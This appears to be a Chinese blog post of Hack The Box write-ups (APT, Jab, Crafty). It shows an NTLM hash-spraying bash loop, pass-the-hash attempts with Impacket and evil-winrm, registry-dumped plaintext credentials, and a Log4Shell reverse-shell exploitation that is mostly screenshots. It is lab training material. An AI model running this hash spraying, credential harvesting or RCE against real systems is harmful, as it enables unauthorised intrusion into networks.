SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_LOGON_FAILURE 
SMB         htb.local       445    APT              [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:72791983d95870c0d6dd999e4389b211 STATUS_LOGON_FAILURE 
SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:9ea25adafeec63e38cef4259d3b15c30 STATUS_LOGON_FAILURE 
SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:3ae49ec5e6fed82ceea0dc2be77750ab STATUS_LOGON_FAILURE 
SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:531c98e26cfa3caee2174af495031187 STATUS_LOGON_FAILURE 
SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:fde29e6cb61b4f7fda1ad5cd2759329d STATUS_LOGON_FAILURE 
SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:51d368765462e9c5aebc456946d8dc86 STATUS_LOGON_FAILURE 
SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:273c48fb014f8e5bf9e2918e3bf7bfbd STATUS_LOGON_FAILURE 
SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:98590500f99a1bee7559e97ad342d995 STATUS_LOGON_FAILURE 
SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:10cf01167854082e180cf549f63c0285 STATUS_LOGON_FAILURE 
SMB         htb.local       445    APT              [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:6149000a4f3f7c57642cbee1ea70c3e1 STATUS_LOGON_FAILURE 
SMB         htb.local       445    APT              [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         htb.local       445    APT              [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         htb.local       445    APT              [-] Connection Error: The NETBIOS connection with the remote host timed out.
。。。

我们发现在尝试过几次碰撞后,提示连接超时,然后报错,重新执行后依然是同样的情况,说明此时我们很有可能触发了服务器的防护措施,尝试一定的次数后失败会被拦截,并且我们的ip有可能会被封锁
既然这个工具执行后会被拦截,我们再尝试其他的,比如impacket库的getTGT.py,这是用来获取TGT的,但是在执行过程中是会获取到匹配成功的hash,不过我们需要再写一个自动化脚本getTGT_auto.sh配合它:

#!/bin/bash

while IFS='' read -r LINE || [ -n "${LINE}" ]
do
	echo "-----------------------"
	echo "Feed the Hash:${LINE}"
	/usr/share/doc/python3-impacket/examples/getTGT.py htb.local/henry.vinson@htb.local -hashes ${LINE}

done < hash_list

先尝试碰撞一个用户,如果不成功,再尝试其他用户。当成功获取到TGT时,会生成一个.ccache文件,因此,我们还需要执行一个监控命令watch监控什么时候生成该文件,当生成时我们就可以手动中断脚本的执行:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# watch "ls -ltr | tail -2"

一段时间后,我们找到了:
2024-03-12-16-19-02

。。。
-----------------------                                                                              
Feed the Hash:aad3b435b51404eeaad3b435b51404ee:945f05a17a39217a6a8b58e9bd26ee46                                                                                             
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra                                                                                               
Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)                                                                              
-----------------------                                                                            
Feed the Hash:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb                                                                                             
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra                                                                                                 
[*] Saving ticket in henry.vinson@htb.local.ccache    
。。。

保存好该匹配成功的hash,观察这个hash的结构,LM部分是aad3b435...,这是空密码编码后的固定编码,当我们拿到一组有效的用户hash,先立即尝试是否能横向迁移

hash传递-尝试横向迁移

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# evil-winrm -i htb.local -u henry.vinson -H 'e53d87d42adaa3ca32bdb34a876cbffb' 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
                                        
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
                                        
Error: Exiting with code 1

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# smbexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# psexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[*] Requesting shares on htb.local.....
[-] share 'backup' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# wmiexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[-] rpc_s_access_denied

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# dcomexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[-] rpc_s_access_denied

注册表泄漏敏感信息

通过以上常用的横向迁移方式,我们都没有成功,我们还可以尝试impacket库中的reg.py看看能不能获取到注册表,虽然严格来说这通常不是用于横向迁移的,但当常用的横向迁移手段都无法取得进展时,应该想到这个思路:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\
HKU\\Console
HKU\\Control Panel
HKU\\Environment
HKU\\Keyboard Layout
HKU\\Network
HKU\\Software
HKU\\System
HKU\\Volatile Environment

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\Software
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software
HKU\Software\GiganticHostingManagementSystem
HKU\Software\Microsoft
HKU\Software\Policies
HKU\Software\RegisteredApplications
HKU\Software\Sysinternals
HKU\Software\VMware, Inc.
HKU\Software\Wow6432Node
HKU\Software\Classes
# Look at the familiar name, which is exactly the same as the one shown on the website. Obviously, this is what we want.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\Software\\GiganticHostingManagementSystem
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software\GiganticHostingManagementSystem
        UserName        REG_SZ   henry.vinson_adm
        PassWord        REG_SZ   G1#Ny5@2dvht
# This exposes credential information!

我们获取到了一组凭据,并且还有可能是某个管理员,接下来尝试该凭据是否有效:

获取立足点

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# evil-winrm -i htb.local -u henry.vinson_adm -p G1#Ny5@2dvht                  
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> whoami
htb\henry.vinson_adm
*Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop> cat user.txt
0b3df55f82208fb1a9593113a8eac7d2

后渗透信息搜集

*Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop> cd ../../
*Evil-WinRM* PS C:\Users> ls


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/24/2020   7:54 AM                Administrator
d-----        9/24/2020   8:39 AM                henry.vinson
d-----        9/24/2020   8:40 AM                henry.vinson_adm
d-r---       11/21/2016   2:39 AM                Public
# After trying to enumerate the contents of all directories again, there is no valuable information or permissions.

尝试枚举出敏感信息文件

这里需要用到一个非常常用的敏感文件枚举目录,项目在:
https://github.com/carlospolop/Auto_Wordlists/
我们可以利用其中的文件包含漏洞字典:
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt
直接在浏览器中筛选几个常用的关键词:
passwd history
结合获取到的所有信息进行分析,筛选,我们最终怀疑最有可能存在以下敏感文件:
2024-03-13-18-26-20
通过尝试,果然我们发现了这个敏感文件,并且能够读取它的内容:

*Evil-WinRM* PS C:\Program files> cat c:/users/administrator/appdata/roaming/microsoft/windows/powershell/psreadline/consolehost_history.txt
Access is denied
At line:1 char:1
+ cat c:/users/administrator/appdata/roaming/microsoft/windows/powershe ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\users\admini...ost_history.txt:String) [Get-Content], UnauthorizedAccessException
    + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
Cannot find path 'C:\users\administrator\appdata\roaming\microsoft\windows\powershell\psreadline\consolehost_history.txt' because it does not exist.
At line:1 char:1
+ cat c:/users/administrator/appdata/roaming/microsoft/windows/powershe ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\users\admini...ost_history.txt:String) [Get-Content], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Program files> cat c:/users/henry.vinson/appdata/roaming/microsoft/windows/powershell/psreadline/consolehost_history.txt
Cannot find path 'C:\users\henry.vinson\appdata\roaming\microsoft\windows\powershell\psreadline\consolehost_history.txt' because it does not exist.
At line:1 char:1
+ cat c:/users/henry.vinson/appdata/roaming/microsoft/windows/powershel ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\users\henry....ost_history.txt:String) [Get-Content], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Program files> cat c:/users/henry.vinson_adm/appdata/roaming/microsoft/windows/powershell/psreadline/consolehost_history.txt
$Cred = get-credential administrator
invoke-command -credential $Cred -computername localhost -scriptblock {Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel -Type DWORD -Value 2 -Force}

说明当前用户

总结

.....

Jab

机器介绍

难度

Medium

信息搜集

tcp全端口扫描:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# nmap -sT --min-rate 10000 -p- 10.129.116.140 -oA nmapscan/ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-01 16:41 CST
Warning: 10.129.116.140 giving up on port because retransmission cap hit (10).
Stats: 0:01:15 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 42.82% done; ETC: 16:44 (0:01:40 remaining)
Stats: 0:02:48 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 98.46% done; ETC: 16:44 (0:00:03 remaining)
Nmap scan report for 10.129.116.140
Host is up (0.26s latency).
Not shown: 60209 filtered tcp ports (no-response), 5320 closed tcp ports (conn-refused)
PORT     STATE SERVICE
53/tcp   open  domain
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3269/tcp open  globalcatLDAPssl
5270/tcp open  xmp

Nmap done: 1 IP address (1 host up) scanned in 178.76 seconds

处理信息:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# tcports=$(grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ',')
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# export $tcports
export: not an identifier: 53,135,139,445,3269,5270

tcp详细扫描:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# nmap -sT -sC -sV -O -p53,135,139,445,3269,5270 10.129.116.140 -oA nmapscan/tcpdetails
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-01 16:52 CST
Nmap scan report for 10.129.116.140
Host is up (0.28s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-01T08:53:32+00:00; -27s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
5270/tcp open  ssl/xmpp      Wildfire XMPP Client
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2019 (95%), Microsoft Windows 10 1709 - 1909 (92%), Microsoft Windows Server 2012 (91%), Microsoft Windows Vista SP1 (90%), Microsoft Windows Longhorn (90%), Microsoft Windows 10 1709 - 1803 (88%), Microsoft Windows 10 1809 - 2004 (88%), Microsoft Windows Server 2012 R2 (88%), Microsoft Windows Server 2012 R2 Update 1 (88%), Microsoft Windows Server 2016 build 10586 - 14393 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -26s, deviation: 0s, median: -27s
| smb2-time: 
|   date: 2024-03-01T08:53:24
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.41 seconds

udp扫描

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# nmap -sU -p- 1000 10.129.116.140 -oA nmapscan/udports

脚本漏扫

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# nmap --script=vuln -p53,135,139,445,3269,5270 10.129.116.140 -oA nmapscan/tcpvul
n
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-01 16:53 CST
Stats: 0:00:19 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 87.59% done; ETC: 16:53 (0:00:01 remaining)
Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 88.50% done; ETC: 16:53 (0:00:01 remaining)
Nmap scan report for 10.129.116.140
Host is up (0.31s latency).

PORT     STATE SERVICE
53/tcp   open  domain
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3269/tcp open  globalcatLDAPssl
5270/tcp open  xmp

Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 109.34 seconds

利用

尝试获取smb共享

──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# smbmap -H 10.129.116.140                                   

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
[!] Something weird happened: SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights. on line 970
Traceback (most recent call last):
  File "/usr/bin/smbmap", line 33, in <module>
    sys.exit(load_entry_point('smbmap==1.9.2', 'console_scripts', 'smbmap')())
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/smbmap/smbmap.py", line 1435, in main
    host = [ host for host in share_drives_list.keys() ][0]
                              ^^^^^^^^^^^^^^^^^^^^^^
AttributeError: 'bool' object has no attribute 'keys'

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# smbclient -L //10.129.116.140 -N
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.116.140 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# crackmapexec smb 10.129.116.140
SMB         10.129.116.140  445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)

尝试连接msrpc

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# rpcclient -U '' -N 10.129.116.140
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> querydominfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> quit

寻找公开漏洞

总结

Crafty

机器介绍

Crafty is an easy-difficulty Windows machine featuring the exploitation of a `Minecraft` server. Enumerating the version of the server reveals that it is vulnerable to pre-authentication Remote Code Execution (RCE), by abusing `Log4j Injection`. After obtaining a reverse shell on the target, enumerating the filesystem reveals that the administrator composed a Java-based `Minecraft` plugin, which when reverse engineered reveals `rcon` credentials. Those credentials are leveraged with the `RunAs` utility to gain Administrative access, compromising the system.
Crafty 是一款难度简单的 Windows 机器,其特点是利用“Minecraft”服务器。列举服务器版本表明,它很容易通过滥用“Log4j 注入”来攻击预身份验证远程代码执行 (RCE)。在目标上获取反向 shell 后,枚举文件系统显示管理员编写了一个基于 Java 的“Minecraft”插件,该插件在逆向工程时会显示“rcon”凭据。这些凭证与“RunAs”实用程序一起使用,以获得管理访问权限,从而破坏系统。

难度

Easy

信息搜集

tcp详细扫描

┌──(root㉿kali)-[/home/kali/Desktop/htb/Crafty]
└─# nmap -sT -sV -sC -O -p80,25565 $ip1 -oA nmapscan/tcpdetails
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-23 12:20 EDT
Nmap scan report for 10.10.11.249 (10.10.11.249)
Host is up (0.24s latency).

PORT      STATE SERVICE   VERSION
80/tcp    open  http      Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://crafty.htb
|_http-server-header: Microsoft-IIS/10.0
25565/tcp open  minecraft Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server, Users: 0/100)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

探测出的端口有限,只有一个iis开放的web服务和Minecraft游戏服务器,显然web服务优先。另外,这里提到不允许直接跳转到一个url,显然根据经验,每个出现的url我们都要尝试写入到hosts文件中,这是很关键的。

脚本漏扫

┌──(root㉿kali)-[/home/kali/Desktop/htb/Crafty]
└─# nmap --script=vuln -p80,25565 10.10.11.249 -oA nmapscan/tcpvuln 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 23:56 EDT
Stats: 0:00:42 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.03% done; ETC: 23:57 (0:00:01 remaining)
Stats: 0:03:57 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.51% done; ETC: 00:00 (0:00:01 remaining)
Nmap scan report for crafty.htb (10.10.11.249)
Host is up (0.12s latency).

PORT      STATE SERVICE
80/tcp    open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
25565/tcp open  minecraft

Nmap done: 1 IP address (1 host up) scanned in 495.65 seconds

无有价值信息。

web初探

访问主页后,又新出现了一个url,同样需要添加到hosts文件中:
2024-09-30-12-10-06
尝试访问新url后发现和原站点看起来几乎没有任何差别,继续探索原站点功能点,点击后都是跳转到http://crafty.htb/coming-soon
F12查看源码,初步浏览后也没有发现可疑点。

目录爆破

继续尝试目录爆破,同时用多个常用工具确保结果完整,最终用dirbgobusterferoxbuster都无有价值发现。

dns爆破

由于之前提到有个子域名,但访问后与原域名相同内容,我们有理由可以猜测可能还存在其他子域名,尝试爆破,但是结果只扫到已知的子域名。

虚拟主机爆破(视频提示, 子域名爆破中的”亿”点细节)

子域名爆破后无结果,尝试其他也一样,最后观看红笔视频,得到启发,原来是考虑不周到了,除了子域名爆破外,实际上还可以尝试虚拟主机爆破,也就是当某个目标服务器上可能托管多个网站或应用时(比如现实环境中的多租户环境场景),也可能从中发现其他虚拟主机,url的表现形式也是和子域名相同的。所以我们需要将gobuster的扫描模式切换为vhost,两者原理不同, 所以填写的参数也会略微有些差异, 并且还要注意的是字典中是各个单独项而不是完整的子域名, 所以参数要加上--append-domain, 另外从已知的域名来看存在重定向的关系,因此还可以加上-r跟随重定向:

┌──(root㉿kali)-[/home/kali/Desktop/htb/Crafty]
└─# gobuster vhost -u http://10.10.11.249 --domain crafty.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain -r

dns选项主要是通过53端口dns服务器的解析来判断子域名; 而vhost主要是通过捕获到的响应数据包的HOST头, 结合状态码来判断子域名。所以, 如果当没有开放53端口时, 还可以考虑用vhost选项来实现探测子域名。

gobuster的提高效率小tips(视频补充)

gobuster的completion选项可以很好地改变当前shell对gobuster的交互性, 很有效地改善使用体验, 减少命令的记忆性与繁琐操作(如不记得接下来要填什么参数, 每次都--help), 会较智能化地为我们提供思路, 尤其在现实测试环境中有利于提高效率, 还有其他大型工具如nmap等都有类似的选项。
使用技巧如下:
先查看当前shell环境类型:

┌──(root㉿kali)-[/home/kali]
└─# echo $SHELL
/usr/bin/zsh

使用以下命令可以自动生成改变shell环境脚本:
2024-10-02-21-46-58
需要将其附加到当前用户zsh的配置文件~/.zshrc中, 并让其生效:
2024-10-02-21-49-35
此时输入gobuster再tab就是直接显示帮助命令, 而不是默认的shell环境选择文件了, 并且随着命令的不断补充, 会依次逐级提示, 提供更完善的命令帮助, 体验感觉就是跟着我们的思路一步步提供更精确的命令撰写。

渗透陌生端口时的探测方式(视频补充)

比如这里的25565端口, 熟悉Minecraft游戏的当然一眼就能看出来这通常是联机加入服务器的默认端口, 但假如现在不熟悉, 可以采用下面的方式:

  1. 浏览器访问
  2. curl访问
  3. nc连接目标, 观察反应
    2024-10-02-22-06-13
    出现解码异常, 但暴露出一些信息, 比如这是用java写的。
    2024-10-02-22-11-11
    -L是跟随重定向, 同样的结果。另外, 尝试nc连接没反应。

探索Minecraft服务器

将openvpn切换成用windows连接,并同样配置好windows的hosts文件,根据经验,如果要成功连接进入一个mc服务器,通常需要本地下载的mc版本和部分mods都对应上,先尝试用任意版本连接服务器查看版本(其实上面nmap也已经扫描到了):
2024-10-02-22-36-41
2024-10-02-22-36-58
因此要通过本地的1.16.5版本的mc连接。

寻找公开poc

通过以下关键词来寻找我们需要的:
2024-10-04-17-00-53
最终在【文章1】中给出了明确的利用方式。
同时,在【文章2】中对log4shell原理部分进行了详细的解释以及小实验演示。
原理很好理解,但是能想到这个漏洞不容易:
2024-10-04-17-22-43
2024-10-04-17-24-21

获取立足点

利用时注意由于目标是windows,而poc.py中默认是linux的shell,所以要修改成对应的反弹shell环境:
2024-10-04-17-04-54
2024-10-04-16-57-13
2024-10-04-22-27-50
同时进入Minecraft后,聊天框中输入生成的jndi字符串格式payload,拿到了shell。
2024-10-04-17-08-22

rlwrap提高反弹shell交互性(视频补充)

2024-10-04-21-54-28
提高交互后,将反弹回来的shell再切换成powershell,此时就可以用gci等命令快速地获取想要的信息,如:
2024-10-04-22-04-28

提权前的枚举

当前用户目录和c盘下的inetpub网站目录中并没有发现有价值信息,只有两个.jar包可以尝试提取出来进一步分析,但是目标机器没有安装python,经验不足只能想到该方式,不知道还有哪些其他方式能够提取。

impacket-smbserver传输目标系统文件(视频补充)

即使没有python,但由于目标是windows,因此可以尝试用impacket库提供的工具创建一个smb服务器,利用smb共享来传输文件:
2024-10-04-22-44-56
记得别忘了清理连接痕迹!
2024-10-04-22-50-31

逆向jar包

  • alipay_img
  • wechat_img
此作者没有提供个人介绍
最后更新于 2024-10-09